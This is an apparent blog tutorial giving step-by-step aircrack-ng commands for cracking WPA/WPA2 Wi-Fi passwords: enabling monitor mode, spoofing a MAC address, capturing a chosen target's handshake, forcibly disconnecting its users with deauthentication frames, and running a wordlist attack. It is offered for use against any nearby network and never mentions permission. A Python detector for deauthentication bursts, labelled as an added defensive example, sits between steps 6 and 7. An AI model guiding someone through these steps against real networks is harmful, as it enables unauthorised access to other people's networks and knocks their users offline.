
Wednesday 2 July 2014

Cracking WPA/WPA2 Passwords

Introduction:


Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2) are two security protocols and security certification programs developed by the Wi-Fi Alliance to secure wireless computer networks. The Alliance defined these in response to serious weaknesses researchers had found in the previous system, WEP (Wired Equivalent Privacy).
WPA (sometimes referred to as the draft IEEE 802.11i standard) became available in 2003. The Wi-Fi Alliance intended it as an intermediate measure in anticipation of the availability of the more secure and complex WPA2. WPA2 became available in 2004 and is a common shorthand for the full IEEE 802.11i (or IEEE 802.11i-2004) standard.
WPA2 has replaced WPA. WPA2, which requires testing and certification by the Wi-Fi Alliance, implements the mandatory elements of IEEE 802.11i. In particular, it introduces CCMP, a new AES-based encryption mode with strong security. Certification began in September, 2004; from March 13, 2006, WPA2 certification is mandatory for all new devices to bear the Wi-Fi trademark.
Pre-shared key mode (PSK, also known as Personal mode) is designed for home and small office networks that don't require the complexity of an 802.1X authentication server. Each wireless network device encrypts the network traffic using a 256-bit key. This key may be entered either as a string of 64 hexadecimal digits, or as a passphrase of 8 to 63 printable ASCII characters. If ASCII characters are used, the 256-bit key is calculated by applying the PBKDF2 key derivation function to the passphrase, using the SSID as the salt and 4096 iterations of HMAC-SHA1.

Steps To Follow:

Now some of the steps that we are going to use in this tutorial are the same as in the previous tutorial. You can read the previous tutorial here: Hacking WiFi (WEP Encryption). For cracking WPA2 passwords there is no need to capture data packets as for WEP; here we need only the HANDSHAKE. You might be wondering what this HANDSHAKE is. Those who already know it can skip ahead; those who are meeting it for the first time, read below.

HANDSHAKE: the WPA/WPA2 four-way handshake exchanged between a client and the access point when the client connects, i.e. when a user disconnects and connects back to the access point.

Step 1:


Open the terminal window, type the following command without quotes and press the ENTER key.

"airmon-ng"


The result will be something like:

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]


Step 2:

Now type the following command in the same terminal window and press the ENTER key.

"airmon-ng start wlan0"

The result will be something like:

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]
(monitor mode enabled on mon0)


Step 3 (Optional):
 
Change the MAC address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step 4:
 
In the same terminal type this command and hit ENTER.

"airodump-ng mon0"

Now look at the terminal window: here you will see all the nearby wireless access points that are in your range. Select the target you want to attack that has "WPA/WPA2" protection enabled. Wait for 1-2 min. Then press "Ctrl+c" to stop the program.
You will see a screen like this:

Step 5:
 
Open a new terminal window, type the following command and hit ENTER.
   
"airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0"
  
*where -c is the channel of your target,
       -w is the file to be written (you can give it any name),
       --bssid is the BSSID of your target.
So replace 3 with your target's channel number and ff:ff:ff:ff:ff:ff with your target's BSSID, then hit ENTER.
Now we have to wait for the handshake, i.e. a user disconnecting and connecting back to our target access point. Wait for at least 5 minutes. If you still don't get a handshake, open a new terminal and type the following command to disconnect the users from the access point.


Step 6:

Type this command into the new terminal window and press the ENTER key.

"aireplay-ng -0 5 -a ff:ff:ff:ff:ff:ff mon0"

This command will disconnect all the users connected to the target access point, and we will get the HANDSHAKE automatically when they reconnect. Once you get a handshake you will see it on the same screen, as in the image below.
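Step 6 works because the deauthentication frames it sends are ordinary unprotected management frames that the clients obey. From the defender's side the same burst is visible in a monitor-mode capture. The following is an added example, not part of the original post: a small detector that counts deauthentication/disassociation frames per BSSID inside a sliding time window and raises one alert when a burst reaches a threshold, flagging whether the frames were addressed to the broadcast address. The frame records, MAC addresses, reason codes, window and threshold are all constructed for the example; the MgmtFrame layout is this example's own, not a capture-library format.

```python
"""Flag deauthentication bursts in a management-frame log.

Added example (not from the original post). Frame records below are
constructed; a real deployment would fill them from a monitor-mode capture.
"""
from collections import defaultdict, deque
from dataclasses import dataclass

BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass(frozen=True)
class MgmtFrame:
    ts: float       # capture time in seconds
    subtype: str    # "deauth", "disassoc", "beacon", ...
    bssid: str      # AP the frame claims to come from
    dst: str        # receiver address; BROADCAST hits every client at once
    reason: int     # 802.11 reason code carried by deauth/disassoc frames


def detect_deauth_bursts(frames, window=2.0, threshold=5):
    """Return one alert dict per burst of >= threshold deauth/disassoc frames
    for a single BSSID whose timestamps fall within `window` seconds.

    The alert fires exactly once, at the moment the count reaches the
    threshold; a later burst for the same BSSID fires again.
    """
    recent = defaultdict(deque)   # bssid -> frames still inside the window
    alerts = []
    for f in sorted(frames, key=lambda x: x.ts):
        if f.subtype not in ("deauth", "disassoc"):
            continue
        q = recent[f.bssid]
        q.append(f)
        while f.ts - q[0].ts > window:   # q always holds f itself, so never empty
            q.popleft()
        if len(q) == threshold:
            alerts.append({
                "bssid": f.bssid,
                "first_ts": q[0].ts,
                "last_ts": f.ts,
                "count": len(q),
                "broadcast": any(x.dst == BROADCAST for x in q),
                "reasons": sorted({x.reason for x in q}),
            })
    return alerts


# Constructed sample: one AP sees five broadcast deauths in under half a
# second, a second AP sees a single deauth of the kind a client leaving
# normally produces. Locally administered (02:...) addresses are used so the
# sample cannot collide with real hardware.
AP_A = "02:00:00:00:00:0a"
AP_B = "02:00:00:00:00:0b"
CLIENT = "02:00:00:00:00:c1"

SAMPLE_FRAMES = [
    MgmtFrame(9.0, "beacon", AP_A, BROADCAST, 0),
    MgmtFrame(9.5, "deauth", AP_B, CLIENT, 3),      # single deauth, not a burst
    MgmtFrame(10.0, "deauth", AP_A, BROADCAST, 7),
    MgmtFrame(10.1, "deauth", AP_A, BROADCAST, 7),
    MgmtFrame(10.2, "deauth", AP_A, BROADCAST, 7),
    MgmtFrame(10.3, "deauth", AP_A, BROADCAST, 7),
    MgmtFrame(10.4, "deauth", AP_A, BROADCAST, 7),
    MgmtFrame(11.0, "beacon", AP_A, BROADCAST, 0),
]


def run_sample():
    """Run the detector over the constructed frames; returns the alert list."""
    return detect_deauth_bursts(SAMPLE_FRAMES, window=2.0, threshold=5)


if __name__ == "__main__":
    for a in run_sample():
        print(f"deauth burst from {a['bssid']}: {a['count']} frames "
              f"in {a['last_ts'] - a['first_ts']:.1f}s, broadcast={a['broadcast']}")
```

The threshold and window are tuning knobs: a single deauth is normal whenever a client roams or powers off, so the detector keys on rate rather than presence, and a broadcast destination is a useful extra signal because an access point has little reason to deauthenticate every client at once unless it is rebooting. Wireless intrusion detection systems apply the same idea to the raw frame stream.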

Step 7:

The file that contains the HANDSHAKE is saved in the HOME folder. Now open the HOME folder and keep it open. The location of the Root folder is: PLACES (top left corner of the desktop) >> HOME. In this folder you will see all the files that you have captured.

Step 8:

Now to crack the password we need a WORDLIST file, which contains a huge list of passwords. In BackTrack we are already provided with two wordlist files, i.e. darkc0de.lst and rockyou.txt. You can find them in the /pentest/passwords/wordlists folder. Drag and drop the wordlist file after -w in the command below.

aircrack-ng -w 'darkc0de.lst' 'wpacrack-01.cap'

"wpacrack-01.cap" is our captured data file located in the Root folder. Just drag and drop it into the terminal and hit ENTER. This will start the password cracking process and will show the password as text.

Note: You will see the password only if the wordlist contains that password. It may take some time to crack; it may even sometimes take 60-90 minutes. So have some patience and enjoy hacking.


Keep Visiting For More Updates....Thank you and have a Great Day....!!!

© 2020 ETHICAL HACKING. Designed by Vijay Patel